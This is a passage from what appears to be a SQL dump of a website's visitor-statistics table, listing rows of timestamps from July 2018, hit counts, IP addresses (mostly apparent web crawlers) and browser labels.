,0,'54.36.149.22','other'),(273365,1531573048,1,1,0,0,'54.36.148.37','other'),(273366,1531573242,1,1,0,0,'54.36.148.204','other'),(273367,1531573716,1,1,0,0,'54.36.148.194','other'),(273368,1531573759,1,1,0,0,'54.36.149.92','other'),(273369,1531573804,1,1,0,0,'54.36.148.150','other'),(273370,1531573944,1,1,0,0,'54.36.148.208','other'),(273371,1531574150,1,1,0,0,'54.36.149.0','other'),(273372,1531574157,1,1,0,0,'54.36.149.31','other'),(273373,1531574295,1,1,0,0,'54.36.148.39','other'),(273374,1531574339,1,1,0,0,'54.36.148.226','other'),(273375,1531574363,1,1,0,0,'54.36.148.193','other'),(273376,1531574574,3,3,0,0,'216.244.66.241','other'),(273377,1531574755,1,1,0,0,'54.36.149.91','other'),(273378,1531574857,1,1,0,0,'54.36.148.16','other'),(273379,1531574873,1,1,0,0,'54.36.148.54','other'),(273380,1531574927,1,1,0,0,'54.36.149.13','other'),(273381,1531575063,1,1,0,0,'54.36.149.72','other'),(273382,1531575157,1,1,0,0,'54.36.149.103','other'),(273383,1531575158,1,1,0,0,'54.36.148.118','other'),(273384,1531575168,1,1,0,0,'54.36.149.12','other'),(273385,1531575256,1,1,0,0,'54.36.149.56','other'),(273386,1531575358,1,1,0,0,'54.36.148.75','other'),(273387,1531575434,2,2,0,0,'54.36.148.144','other'),(273388,1531575683,1,1,0,0,'8.29.198.25','other'),(273389,1531575820,1,1,0,0,'54.36.148.95','other'),(273390,1531575917,1,0,1,0,'66.249.69.163',''),(273391,1531575954,1,1,0,0,'54.36.149.44','other'),(273392,1531576204,1,1,0,0,'91.209.11.236','other'),(273393,1531576290,1,0,1,0,'66.249.69.89',''),(273394,1531576291,1,0,1,0,'66.249.69.91',''),(273395,1531576323,1,1,0,0,'66.249.69.91','chrome'),(273396,1531576418,1,1,0,0,'216.244.66.241','other'),(273397,1531576757,1,1,0,0,'54.36.149.10','other'),(273398,1531576770,1,1,0,0,'54.36.149.41','other'),(273399,1531576996,1,1,0,0,'54.36.148.184','other'),(273400,1531577032,1,1,0,0,'54.36.148.142','other'),(273401,1531577039,2,2,0,0,'54.36.148.44','other'),(273402,1531577307,3,3,0,0,'144.76.38.40','other'),(273403,1531577355,2,2,0,0,'216.244.66.241','other'),(273404,1531577647,1,0,1,0,'66.249.69.93',''),(273405,1531577704,1,1,0,0,'54.36.148.118','other'),(273406,1531577763,1,1,0,0,'54.36.149.42','other'),(273407,1531578559,1,1,0,0,'54.36.149.102','other'),(273408,1531578628,1,1,0,0,'141.8.142.74','other'),(273409,1531578689,1,1,0,0,'54.36.149.84','other'),(273410,1531578799,1,1,0,0,'54.36.148.32','other'),(273411,1531579208,1,1,0,0,'157.55.39.233','other'),(273412,1531579216,1,1,0,0,'54.36.148.216','other'),(273413,1531579282,1,0,1,0,'66.249.69.91',''),(273414,1531579343,1,1,0,0,'54.36.148.186','other'),(273415,1531579482,1,1,0,0,'54.36.149.53','other'),(273416,1531579676,2,2,0,0,'216.244.66.241','other'),(273417,1531579897,1,1,0,0,'54.36.148.206','other'),(273418,1531580191,1,1,0,0,'54.36.149.87','other'),(273419,1531580324,2,2,0,0,'54.36.148.224','other'),(273420,1531580419,1,0,1,0,'66.249.69.169',''),(273421,1531580924,1,1,0,0,'54.36.148.32','other'),(273422,1531581488,1,1,0,0,'66.249.69.167','chrome'),(273423,1531581815,1,1,0,0,'91.209.11.236','other'),(273424,1531581915,3,3,0,0,'216.244.66.241','other'),(273425,1531581965,1,1,0,0,'54.36.148.123','other'),(273426,1531582066,1,1,0,0,'54.36.148.71','other'),(273427,1531582132,1,1,0,0,'178.154.171.88','other'),(273428,1531582239,1,1,0,0,'54.36.149.59','other'),(273429,1531582485,1,1,0,0,'54.36.148.191','other'),(273430,1531582510,1,1,0,0,'54.36.148.61','other'),(273431,1531582540,1,1,0,0,'54.36.148.10','other'),(273432,1531582570,1,0,1,0,'66.249.69.163',''),(273433,1531582864,1,1,0,0,'8.29.198.26','other'),(273434,1531582931,1,1,0,0,'216.244.66.241','other'),(273435,1531583025,1,1,0,0,'13.66.205.121','other'),(273436,1531583046,1,1,0,0,'54.36.148.66','other'),(273437,1531583360,1,0,1,0,'66.249.69.167',''),(273438,1531583662,1,1,0,0,'91.209.11.236','other'),(273439,1531583781,1,1,0,0,'54.36.148.208','other'),(273440,1531583808,1,1,0,0,'54.36.148.254','other'),(273441,1531583847,1,1,0,0,'54.36.148.170','other'),(273442,1531583878,1,1,0,0,'216.244.66.241','other'),(273443,1531584033,4,4,0,0,'5.9.141.8','other'),(273444,1531584182,2,2,0,0,'91.196.178.177','chrome'),(273445,1531584502,1,1,0,0,'54.36.148.65','other'),(273446,1531584775,1,1,0,0,'54.36.148.37','other'),(273447,1531584838,1,1,0,0,'141.8.132.19','other'),(273448,1531584841,1,1,0,0,'178.154.171.88','other'),(273449,1531584867,1,1,0,0,'54.36.149.91','other'),(273450,1531584966,1,1,0,0,'54.36.148.210','other'),(273451,1531585100,1,0,1,0,'66.249.69.163',''),(273452,1531585174,2,2,0,0,'216.244.66.241','other'),(273453,1531585237,1,1,0,0,'54.36.149.75','other'),(273454,1531585324,1,1,0,0,'54.36.148.118','other'),(273455,1531585379,1,1,0,0,'54.36.149.65','other'),(273456,1531585384,1,1,0,0,'54.36.148.16','other'),(273457,1531585478,1,1,0,0,'54.36.149.31','other'),(273458,1531586050,1,1,0,0,'54.36.148.102','other'),(273459,1531586069,1,0,1,0,'66.249.69.169',''),(273460,1531586145,1,1,0,0,'54.36.148.22','other'),(273461,1531586306,1,1,0,0,'54.36.148.55','other'),(273462,1531586522,1,1,0,0,'8.29.198.25','other'),(273463,1531586587,1,1,0,0,'54.36.148.59','other'),(273464,1531586783,1,1,0,0,'54.36.149.61','other'),(273465,1531586828,1,1,0,0,'54.36.148.205','other'),(273466,1531587073,1,1,0,0,'54.36.149.77','other'),(273467,1531587201,1,1,0,0,'54.36.149.82','other'),(273468,1531587248,1,1,0,0,'54.36.149.101','other'),(273469,1531587269,1,1,0,0,'54.36.148.71','other'),(273470,1531587477,1,1,0,0,'54.36.148.251','other'),(273471,1531587544,1,1,0,0,'54.36.149.11','other'),(273472,1531587834,1,1,0,0,'216.244.66.241','other'),(273473,1531588033,1,1,0,0,'54.36.148.147','other'),(273474,1531588099,1,1,0,0,'54.36.148.157','other'),(273475,1531588116,1,1,0,0,'66.249.69.89','chrome'),(273476,1531588229,1,1,0,0,'46.211.156.85','other'),(273477,1531588357,1,1,0,0,'54.36.148.31','other'),(273478,1531588824,1,1,0,0,'54.36.148.51','other'),(273479,1531589089,1,1,0,0,'54.36.148.143','other'),(273480,1531589150,3,3,0,0,'216.244.66.241','other'),(273481,1531589272,2,2,0,0,'54.36.148.134','other'),(273482,1531589572,1,1,0,0,'54.36.149.78','other'),(273483,1531589640,1,1,0,0,'54.36.148.79','other'),(273484,1531589644,17,17,0,0,'5.9.158.195','other'),(273485,1531589715,1,1,0,0,'54.36.148.25','other'),(273486,1531589720,1,1,0,0,'40.77.167.63','other'),(273487,1531589736,2,2,0,0,'54.165.59.7','other'),(273488,1531589758,1,1,0,0,'54.36.148.126','other'),(273489,1531589933,1,1,0,0,'54.36.148.171','other'),(273490,1531590200,1,1,0,0,'54.36.148.21','other'),(273491,1531590741,1,1,0,0,'54.36.148.227','other'),(273492,1531591043,1,1,0,0,'66.249.69.93','chrome'),(273493,1531591212,1,1,0,0,'54.36.148.81','other'),(273494,1531591239,1,1,0,0,'54.36.148.107','other'),(273495,1531591243,1,1,0,0,'54.36.148.161','other'),(273496,1531591514,1,1,0,0,'54.36.148.111','other'),(273497,1531591539,1,1,0,0,'54.36.149.59','other'),(273498,1531591554,1,1,0,0,'54.36.149.34','other'),(273499,1531591717,1,1,0,0,'54.36.148.59','other'),(273500,1531591771,1,1,0,0,'54.36.148.93','other'),(273501,1531592390,1,1,0,0,'54.36.149.67','other'),(273502,1531592484,1,1,0,0,'54.36.149.93','other'),(273503,1531592742,2,2,0,0,'92.113.189.235','chrome'),(273504,1531592891,1,1,0,0,'54.36.148.85','other'),(273505,1531593006,1,1,0,0,'54.36.149.91','other'),(273506,1531593077,1,1,0,0,'141.8.142.74','other'),(273507,1531593263,1,1,0,0,'54.36.148.167','other'),(273508,1531593310,1,1,0,0,'54.36.148.210','other'),(273509,1531593474,1,1,0,0,'54.36.149.13','other'),(273510,1531593479,1,1,0,0,'95.163.255.192','other'),(273511,1531593707,1,1,0,0,'8.29.198.25','other'),(273512,1531593769,1,1,0,0,'54.36.149.85','other'),(273513,1531593841,1,1,0,0,'54.36.148.85','other'),(273514,1531594147,1,1,0,0,'54.36.149.15','other'),(273515,1531594161,1,1,0,0,'54.165.59.7','other'),(273516,1531594204,1,1,0,0,'54.36.148.34','other'),(273517,1531594342,1,1,0,0,'54.36.148.255','other'),(273518,1531594381,1,0,1,0,'66.249.69.167',''),(273519,1531594411,1,1,0,0,'54.36.148.232','other'),(273520,1531594487,1,1,0,0,'54.36.148.38','other'),(273521,1531594697,2,2,0,0,'216.244.66.241','other'),(273522,1531594887,1,1,0,0,'54.36.148.186','other'),(273523,1531594956,1,1,0,0,'54.36.148.26','other'),(273524,1531594966,1,1,0,0,'66.249.69.163','chrome'),(273525,1531595036,1,1,0,0,'54.36.148.190','other'),(273526,1531595046,1,1,0,0,'66.249.69.93','chrome'),(273527,1531595125,2,1,1,0,'66.249.69.167',''),(273528,1531595140,1,1,0,0,'54.36.148.195','other'),(273529,1531595159,1,1,0,0,'207.46.13.210','other'),(273530,1531595167,1,1,0,0,'54.36.149.52','other'),(273531,1531595330,1,1,0,0,'54.36.148.68','other'),(273532,1531595346,1,1,0,0,'54.36.149.5','other'),(273533,1531595551,1,1,0,0,'54.36.148.189','other'),(273534,1531595584,1,1,0,0,'54.36.148.64','other'),(273535,1531595660,1,0,1,0,'66.249.69.169',''),(273536,1531595948,1,1,0,0,'54.36.148.169','other'),(273537,1531595975,1,1,0,0,'54.36.149.56','other'),(273538,1531596012,1,1,0,0,'37.73.57.43','chrome'),(273539,1531596032,1,0,1,0,'66.249.69.163',''),(273540,1531596176,1,1,0,0,'54.36.148.94','other'),(273541,1531596494,1,1,0,0,'54.36.149.3','other'),(273542,1531596601,1,1,0,0,'54.36.148.200','other'),(273543,1531596631,1,0,1,0,'66.249.69.167',''),(273544,1531596640,1,1,0,0,'54.36.149.99','other'),(273545,1531596723,1,1,0,0,'54.36.148.161','other'),(273546,1531596795,1,1,0,0,'91.137.18.82','other'),(273547,1531596895,1,1,0,0,'54.36.148.30','other'),(273548,1531597106,1,1,0,0,'54.36.148.69','other'),(273549,1531597213,1,0,1,0,'66.249.69.91',''),(273550,1531597223,2,2,0,0,'66.249.69.167','chrome'),(273551,1531597366,1,1,0,0,'8.29.198.25','other'),(273552,1531597395,1,1,0,0,'109.86.71.21','firefox'),(273553,1531597663,1,1,0,0,'54.36.148.254','other'),(273554,1531597764,1,1,0,0,'54.36.149.3','other'),(273555,1531597766,1,1,0,0,'54.36.148.74','other'),(273556,1531597851,1,1,0,0,'54.36.149.64','other'),(273557,1531597947,2,0,2,0,'66.249.69.89',''),(273558,1531597966,1,1,0,0,'54.36.148.106','other'),(273559,1531598004,1,1,0,0,'54.36.149.59','other'),(273560,1531598152,1,0,1,0,'66.249.69.167',''),(273561,1531598265,1,1,0,0,'54.36.148.122','other'),(273562,1531598328,1,1,0,0,'54.36.148.177','other'),(273563,1531598544,2,2,0,0,'66.249.69.167','chrome'),(273564,1531598833,1,1,0,0,'54.36.149.3','other'),(273565,1531598851,2,1,1,0,'66.249.69.169',''),(273566,1531599041,3,1,2,0,'66.249.69.163',''),(273567,1531599112,1,1,0,0,'54.36.148.229','other'),(273568,1531599173,1,1,0,0,'54.36.148.45','other'),(273569,1531599211,1,1,0,0,'54.36.149.57','other'),(273570,1531599241,1,1,0,0,'54.36.148.207','other'),(273571,1531599430,1,1,0,0,'37.52.23.214','chrome'),(273572,1531599700,1,1,0,0,'54.36.149.23','other'),(273573,1531599821,1,0,1,0,'66.249.69.167',''),(273574,1531599825,1,1,0,0,'54.36.148.78','other'),(273575,1531599930,1,0,1,0,'66.249.69.169',''),(273576,1531599935,1,1,0,0,'54.36.148.61','other'),(273577,1531600175,1,1,0,0,'54.36.149.18','other'),(273578,1531600384,1,1,0,0,'54.36.149.41','other'),(273579,1531600450,1,1,0,0,'54.36.148.96','other'),(273580,1531600477,1,1,0,0,'216.244.66.241','other'),(273581,1531600490,1,1,0,0,'54.36.148.243','other'),(273582,1531600573,3,0,3,0,'66.249.69.163',''),(273583,1531600833,1,1,0,0,'54.36.148.100','other'),(273584,1531600914,1,1,0,0,'66.249.69.93','chrome'),(273585,1531600938,3,1,2,0,'66.249.69.163',''),(273586,1531600987,1,1,0,0,'54.36.149.9','other'),(273587,1531601049,1,1,0,0,'54.36.148.117','other'),(273588,1531601068,1,1,0,0,'54.36.149.5','other'),(273589,1531601519,1,0,1,0,'66.249.69.169',''),(273590,1531601744,1,1,0,0,'54.36.148.237','other'),(273591,1531601974,1,0,1,0,'66.249.69.167',''),(273592,1531602236,1,1,0,0,'54.36.148.52','other'),(273593,1531602282,1,0,1,0,'66.249.69.163',''),(273594,1531602465,1,1,0,0,'54.36.148.70','other'),(273595,1531602549,1,1,0,0,'54.36.148.73','other'),(273596,1531602794,1,1,0,0,'54.36.148.176','other'),(273597,1531602843,2,2,0,0,'216.244.66.241','other'),(273598,1531603090,1,1,0,0,'54.36.149.57','other'),(273599,1531603113,2,1,1,0,'66.249.69.167',''),(273600,1531603261,1,1,0,0,'54.36.148.83','other'),(273601,1531603305,1,0,1,0,'66.249.69.163',''),(273602,1531603330,1,1,0,0,'54.36.149.68','other'),(273603,1531603374,1,1,0,0,'54.36.149.43','other'),(273604,1531604110,1,1,0,0,'80.241.214.123','other'),(273605,1531604189,1,0,1,0,'66.249.69.169',''),(273606,1531604235,1,1,0,0,'54.36.148.191','other'),(273607,1531604262,1,1,0,0,'54.36.148.107','other'),(273608,1531604300,1,0,1,0,'66.249.69.167',''),(273609,1531604325,1,1,0,0,'95.163.255.174','other'),(273610,1531604454,1,1,0,0,'54.36.148.21','other'),(273611,1531604498,28,28,0,0,'5.9.100.40','other'),(273612,1531604509,1,1,0,0,'54.36.148.216','other'),(273613,1531604555,1,1,0,0,'8.29.198.27','other'),(273614,1531604601,1,1,0,0,'37.9.113.182','other'),(273615,1531604958,1,1,0,0,'178.154.171.88','other'),(273616,1531604983,1,1,0,0,'52.53.201.78','chrome'),(273617,1531604989,2,0,2,0,'66.249.69.163',''),(273618,1531605275,2,2,0,0,'216.244.66.241','other'),(273619,1531605279,1,1,0,0,'54.36.148.172','other'),(273620,1531605348,2,2,0,0,'54.165.59.7','other'),(273621,1531605351,1,1,0,0,'141.8.142.74','other'),(273622,1531605352,1,0,1,0,'66.249.69.169',''),(273623,1531605538,2,2,0,0,'95.163.255.116','other'),(273624,1531605548,2,2,0,0,'95.163.255.108','other'),(273625,1531605555,3,3,0,0,'95.163.255.104','other'),(273626,1531605564,2,2,0,0,'95.163.255.118','other'),(273627,1531605582,1,1,0,0,'95.163.255.103','other'),(273628,1531605589,2,2,0,0,'95.163.255.115','other'),(273629,1531605598,1,1,0,0,'95.163.255.119','other'),(273630,1531605605,1,1,0,0,'95.163.255.113','other'),(273631,1531605615,5,5,0,0,'95.163.255.112','other'),(273632,1531605623,3,3,0,0,'95.163.255.114','other'),(273633,1531605637,2,2,0,0,'95.163.255.106','other'),(273634,1531605645,1,1,0,0,'95.163.255.109','other'),(273635,1531605693,1,1,0,0,'95.163.255.102','other'),(273636,1531605795,1,1,0,0,'66.249.69.93','chrome'),(273637,1531605797,1,1,0,0,'66.249.69.169','chrome'),(273638,1531605879,1,1,0,0,'54.36.148.180','other'),(273639,1531606000,1,1,0,0,'54.36.148.133','other'),(273640,1531606001,1,1,0,0,'54.36.149.53','other'),(273641,1531606021,1,1,0,0,'54.36.148.114','other'),(273642,1531606286,1,1,0,0,'54.36.148.253','other'),(273643,1531606435,1,1,0,0,'54.36.148.220','other'),(273644,1531606488,1,1,0,0,'54.36.148.163','other'),(273645,1531606962,2,0,2,0,'66.249.69.167',''),(273646,1531606975,1,1,0,0,'157.55.39.233','other'),(273647,1531607089,1,1,0,0,'54.36.148.183','other'),(273648,1531607248,1,1,0,0,'54.36.148.63','other'),(273649,1531607769,1,1,0,0,'54.36.148.210','other'),(273650,1531607811,1,1,0,0,'54.36.149.48','other'),(273651,1531608014,1,1,0,0,'54.36.148.172','other'),(273652,1531608036,1,1,0,0,'54.36.148.118','other'),(273653,1531608206,1,1,0,0,'8.29.198.26','other'),(273654,1531608228,1,1,0,0,'216.244.66.241','other'),(273655,1531608486,1,1,0,0,'54.36.148.134','other'),(273656,1531608507,1,1,0,0,'54.36.148.200','other'),(273657,1531608565,2,0,2,0,'66.249.69.167',''),(273658,1531608621,1,1,0,0,'54.36.148.31','other'),(273659,1531608643,1,1,0,0,'54.36.148.131','other'),(273660,1531608646,2,0,2,0,'66.249.69.163',''),(273661,1531608887,1,1,0,0,'95.163.255.97','other'),(273662,1531608927,1,1,0,0,'54.36.149.25','other'),(273663,1531609046,1,1,0,0,'54.36.149.11','other'),(273664,1531609134,1,0,1,0,'66.249.79.29',''),(273665,1531609306,1,1,0,0,'54.36.148.177','other'),(273666,1531609311,1,1,0,0,'54.36.148.118','other'),(273667,1531609412,1,1,0,0,'54.36.148.240','other'),(273668,1531609447,1,1,0,0,'37.52.23.223','chrome'),(273669,1531609481,1,1,0,0,'66.249.69.89','chrome'),(273670,1531609546,1,1,0,0,'54.36.148.200','other'),(273671,1531609694,1,1,0,0,'54.36.148.46','other'),(273672,1531609885,2,2,0,0,'216.244.66.241','other'),(273673,1531610149,1,0,1,0,'66.249.69.167',''),(273674,1531610317,1,1,0,0,'54.36.148.111','other'),(273675,1531610333,2,1,1,0,'66.249.69.167',''),(273676,1531610379,1,1,0,0,'54.36.148.82','other'),(273677,1531610381,1,1,0,0,'54.36.148.191','other'),(273678,1531610395,1,0,1,0,'66.249.69.169',''),(273679,1531610407,1,1,0,0,'54.36.148.97','other'),(273680,1531610503,1,1,0,0,'54.36.148.190','other'),(273681,1531610550,1,1,0,0,'54.36.148.223','other'),(273682,1531610806,1,1,0,0,'207.46.13.210','other'),(273683,1531610853,1,1,0,0,'178.154.171.88','other'),(273684,1531610956,1,1,0,0,'54.36.149.95','other'),(273685,1531611152,1,1,0,0,'54.36.148.69','other'),(273686,1531611171,4,4,0,0,'216.244.66.241','other'),(273687,1531611173,1,1,0,0,'54.36.148.79','other'),(273688,1531611210,1,1,0,0,'66.249.69.163','chrome'),(273689,1531611226,1,1,0,0,'54.36.148.98','other'),(273690,1531611362,1,1,0,0,'54.36.148.158','other'),(273691,1531612182,1,1,0,0,'95.132.25.228','chrome'),(273692,1531612273,1,0,1,0,'66.249.69.169',''),(273693,1531612388,1,0,1,0,'66.249.69.163',''),(273694,1531612704,1,1,0,0,'54.36.148.29','other'),(273695,1531612755,1,1,0,0,'141.8.142.74','other'),(273696,1531612757,1,0,1,0,'66.249.69.167',''),(273697,1531612854,1,1,0,0,'51.255.65.46','other'),(273698,1531613098,1,1,0,0,'54.36.149.29','other'),(273699,1531613186,4,4,0,0,'216.244.66.241','other'),(273700,1531613256,1,1,0,0,'54.36.148.152','other'),(273701,1531613496,3,3,0,0,'54.36.148.130','other'),(273702,1531613775,1,1,0,0,'54.36.148.215','other'),(273703,1531613791,1,1,0,0,'54.36.148.255','other'),(273704,1531614024,1,1,0,0,'54.36.148.164','other'),(273705,1531614230,3,0,3,0,'66.249.69.169',''),(273706,1531614232,1,0,1,0,'66.249.69.167',''),(273707,1531614405,1,1,0,0,'54.36.148.21','other'),(273708,1531614483,1,0,1,0,'66.249.69.163',''),(273709,1531614523,1,1,0,0,'141.8.142.74','other'),(273710,1531614613,1,1,0,0,'54.36.149.3','other'),(273711,1531614667,1,1,0,0,'54.36.148.128','other'),(273712,1531614725,1,1,0,0,'54.36.148.191','other'),(273713,1531614893,1,1,0,0,'54.36.148.213','other'),(273714,1531614942,1,1,0,0,'66.249.69.91','chrome'),(273715,1531615391,1,1,0,0,'8.29.198.26','other'),(273716,1531615421,1,1,0,0,'54.36.149.29','other'),(273717,1531615512,1,1,0,0,'54.36.149.68','other'),(273718,1531615734,1,1,0,0,'54.36.149.12','other'),(273719,1531615770,2,2,0,0,'216.244.66.241','other'),(273720,1531615830,1,0,1,0,'66.249.69.167',''),(273721,1531615967,1,0,1,0,'66.249.69.163',''),(273722,1531616096,1,1,0,0,'54.36.148.36','other'),(273723,1531616498,1,1,0,0,'66.249.69.169','chrome'),(273724,1531616567,1,1,0,0,'54.36.148.79','other'),(273725,1531616586,1,1,0,0,'54.36.148.241','other'),(273726,1531617151,1,1,0,0,'54.36.148.13','other'),(273727,1531617204,1,1,0,0,'54.36.148.90','other'),(273728,1531617260,1,1,0,0,'54.36.148.238','other'),(273729,1531617303,1,1,0,0,'141.8.142.74','other'),(273730,1531617330,1,1,0,0,'54.36.148.220','other'),(273731,1531617672,1,1,0,0,'54.36.148.146','other'),(273732,1531617754,1,1,0,0,'54.36.149.106','other'),(273733,1531618082,1,1,0,0,'54.36.148.107','other'),(273734,1531618096,1,1,0,0,'54.36.149.52','other'),(273735,1531618228,1,1,0,0,'54.36.148.180','other'),(273736,1531618526,1,1,0,0,'54.36.148.71','other'),(273737,1531619044,1,1,0,0,'8.29.198.26','other'),(273738,1531619100,1,1,0,0,'54.36.148.161','other'),(273739,1531619232,1,1,0,0,'54.36.148.213','other'),(273740,1531619292,2,0,2,0,'66.249.69.167',''),(273741,1531619376,1,1,0,0,'54.165.59.7','other'),(273742,1531619424,1,1,0,0,'54.36.149.17','other'),(273743,1531619490,1,1,0,0,'5.166.149.252','msie'),(273744,1531619558,1,0,1,0,'66.249.69.163',''),(273745,1531619607,1,1,0,0,'54.36.148.100','other'),(273746,1531619677,1,0,1,0,'66.249.69.169',''),(273747,1531619827,1,1,0,0,'66.249.69.169','chrome'),(273748,1531619830,2,2,0,0,'66.249.69.93','chrome'),(273749,1531619847,1,1,0,0,'54.36.149.50','other'),(273750,1531619967,1,1,0,0,'54.36.148.118','other'),(273751,1531620130,1,1,0,0,'54.36.148.64','other'),(273753,1531620240,1,1,0,0,'54.36.149.54','other'),(273754,1531620407,1,1,0,0,'54.36.148.145','other'),(273755,1531620446,1,1,0,0,'54.36.148.123','other'),(273756,1531620688,2,2,0,0,'54.36.149.48','other'),(273757,1531620917,2,2,0,0,'216.244.66.241','other'),(273758,1531621124,1,1,0,0,'54.36.148.71','other'),(273759,1531621436,1,1,0,0,'54.36.148.241','other'),(273760,1531621654,1,1,0,0,'54.36.148.14','other'),(273761,1531621864,1,1,0,0,'216.244.66.241','other'),(273762,1531622009,1,1,0,0,'54.36.149.53','other'),(273763,1531622177,1,1,0,0,'51.255.65.46','other'),(273764,1531622304,1,1,0,0,'54.36.148.34','other'),(273765,1531622437,1,1,0,0,'188.244.32.76','chrome'),(273766,1531622577,1,1,0,0,'54.36.148.77','other'),(273767,1531622890,1,1,0,0,'54.36.149.91','other'),(273768,1531623059,1,1,0,0,'54.36.149.41','other'),(273769,1531623214,1,1,0,0,'54.36.148.170','other'),(273770,1531623243,1,1,0,0,'54.36.149.46','other'),(273771,1531623321,2,2,0,0,'216.244.66.241','other'),(273772,1531623680,1,1,0,0,'54.36.148.180','other'),(273773,1531623731,1,1,0,0,'54.36.148.15','other'),(273774,1531624024,1,1,0,0,'54.36.148.195','other'),(273775,1531624092,1,1,0,0,'54.36.149.91','other'),(273776,1531624252,1,1,0,0,'54.36.148.45','other'),(273777,1531624386,1,1,0,0,'141.8.142.74','other'),(273778,1531624549,1,1,0,0,'54.36.148.176','other'),(273779,1531624747,1,1,0,0,'54.36.148.143','other'),(273780,1531624895,1,1,0,0,'54.36.148.52','other'),(273781,1531625455,1,1,0,0,'54.36.148.203','other'),(273782,1531625530,1,1,0,0,'54.36.148.61','other'),(273783,1531625729,2,2,0,0,'216.244.66.241','other'),(273784,1531625779,1,1,0,0,'54.36.148.163','other'),(273785,1531626103,1,1,0,0,'54.36.149.39','other'),(273786,1531626238,1,1,0,0,'8.29.198.27','other'),(273787,1531626256,1,1,0,0,'178.154.171.88','other'),(273788,1531626272,1,1,0,0,'54.36.148.33','other'),(273789,1531626768,1,1,0,0,'54.36.149.20','other'),(273790,1531627572,1,1,0,0,'54.36.149.50','other'),(273791,1531627642,1,1,0,0,'54.36.148.214','other'),(273792,1531627703,1,1,0,0,'54.36.149.74','other'),(273793,1531627734,1,1,0,0,'216.244.66.241','other'),(273794,1531627779,1,1,0,0,'54.36.149.27','other'),(273795,1531627990,1,1,0,0,'54.36.148.124','other'),(273796,1531627992,1,0,1,0,'66.249.69.89',''),(273797,1531628084,1,1,0,0,'54.36.149.103','other'),(273798,1531628411,1,1,0,0,'40.77.167.63','other'),(273799,1531628695,1,1,0,0,'54.36.148.74','other'),(273800,1531628947,2,2,0,0,'216.244.66.241','other'),(273801,1531629136,1,1,0,0,'54.36.148.102','other'),(273802,1531629624,14,14,0,0,'5.9.108.254','other'),(273803,1531629655,1,1,0,0,'141.8.142.74','other'),(273804,1531629754,1,1,0,0,'51.255.65.46','other'),(273805,1531629879,1,1,0,0,'8.29.198.27','other'),(273806,1531629893,1,0,1,0,'66.249.69.163',''),(273807,1531630027,1,1,0,0,'54.36.148.226','other'),(273808,1531630038,1,1,0,0,'54.36.148.53','other'),(273809,1531630161,1,1,0,0,'216.244.66.241','other'),(273810,1531630571,1,1,0,0,'54.36.148.218','other'),(273811,1531630668,1,1,0,0,'54.36.149.17','other'),(273812,1531630766,1,1,0,0,'54.36.148.238','other'),(273813,1531631094,1,1,0,0,'54.36.149.26','other'),(273814,1531631161,1,1,0,0,'54.36.149.58','other'),(273815,1531631411,1,1,0,0,'54.36.148.245','other'),(273816,1531631500,1,1,0,0,'216.244.66.241','other'),(273817,1531631598,1,1,0,0,'54.36.148.148','other'),(273818,1531631643,1,0,1,0,'66.249.69.163',''),(273819,1531631655,1,1,0,0,'54.36.148.180','other'),(273820,1531631695,1,1,0,0,'54.36.148.142','other'),(273821,1531631703,1,1,0,0,'66.249.69.163','chrome'),(273822,1531631753,1,1,0,0,'66.249.69.89','chrome'),(273823,1531631787,1,1,0,0,'54.36.148.13','other'),(273824,1531631933,1,1,0,0,'54.36.148.253','other'),(273825,1531631998,1,1,0,0,'54.36.148.42','other'),(273826,1531632432,1,1,0,0,'54.36.148.73','other'),(273827,1531632440,1,1,0,0,'54.36.148.106','other'),(273828,1531632637,1,1,0,0,'54.36.148.108','other'),(273829,1531632773,1,1,0,0,'54.36.148.46','other'),(273830,1531632786,1,1,0,0,'54.36.148.86','other'),(273831,1531632968,1,1,0,0,'54.36.148.215','other'),(273832,1531633006,1,1,0,0,'54.36.148.64','other'),(273833,1531633070,1,0,1,0,'66.249.69.89',''),(273834,1531633130,1,0,1,0,'66.249.69.163',''),(273835,1531633253,4,4,0,0,'158.69.251.119','other'),(273836,1531633336,1,1,0,0,'54.36.148.101','other'),(273837,1531633512,2,2,0,0,'178.154.171.88','other'),(273838,1531633530,1,1,0,0,'216.244.66.241','other'),(273839,1531633661,1,1,0,0,'54.36.148.229','other'),(273840,1531633752,1,1,0,0,'54.36.149.57','other'),(273841,1531634143,1,1,0,0,'54.36.148.139','other'),(273842,1531634299,1,1,0,0,'54.36.149.33','other'),(273843,1531634529,1,1,0,0,'54.36.148.232','other'),(273844,1531634904,1,1,0,0,'54.36.148.199','other'),(273845,1531635330,1,1,0,0,'54.36.148.116','other'),(273846,1531635382,1,1,0,0,'54.36.148.15','other'),(273847,1531635392,1,1,0,0,'54.36.148.220','other'),(273848,1531635431,1,1,0,0,'54.36.148.140','other'),(273849,1531635530,1,1,0,0,'54.36.148.42','other'),(273850,1531635569,1,1,0,0,'66.249.69.93','chrome'),(273851,1531635817,2,2,0,0,'216.244.66.241','other'),(273852,1531635892,1,1,0,0,'141.8.142.74','other'),(273853,1531635977,1,1,0,0,'54.36.148.210','other'),(273854,1531636441,1,1,0,0,'54.36.149.100','other'),(273855,1531636493,1,1,0,0,'54.36.148.18','other'),(273856,1531636512,4,0,4,0,'66.249.69.169',''),(273857,1531636575,1,1,0,0,'54.36.149.23','other'),(273858,1531636618,1,1,0,0,'54.36.148.248','other'),(273859,1531636690,1,1,0,0,'54.36.148.10','other'),(273860,1531636753,1,1,0,0,'141.8.142.167','other'),(273861,1531636945,1,1,0,0,'54.36.148.47','other'),(273862,1531637004,1,0,1,0,'66.249.69.163',''),(273863,1531637028,5,1,4,0,'66.249.69.163',''),(273864,1531637076,1,1,0,0,'8.29.198.25','other'),(273865,1531637156,1,1,0,0,'216.244.66.241','other'),(273866,1531637241,1,1,0,0,'54.36.149.74','other'),(273867,1531637569,1,1,0,0,'54.36.148.142','other'),(273868,1531637947,1,1,0,0,'54.36.148.22','other'),(273869,1531638017,2,0,2,0,'66.249.69.167',''),(273870,1531638104,2,0,2,0,'66.249.69.163',''),(273871,1531638548,1,1,0,0,'216.244.66.241','other'),(273872,1531638558,1,1,0,0,'54.36.148.127','other'),(273873,1531638559,1,1,0,0,'54.36.148.100','other'),(273874,1531638563,1,0,1,0,'66.249.69.89',''),(273875,1531638583,1,1,0,0,'46.211.4.214','chrome'),(273876,1531638590,1,0,1,0,'66.249.69.91',''),(273877,1531638601,1,1,0,0,'54.36.149.66','other'),(273878,1531638624,2,0,2,0,'66.249.69.169',''),(273879,1531638651,1,1,0,0,'54.36.148.161','other'),(273880,1531638904,1,1,0,0,'54.36.148.34','other'),(273881,1531638984,1,1,0,0,'54.36.148.12','other'),(273882,1531639046,1,1,0,0,'54.36.148.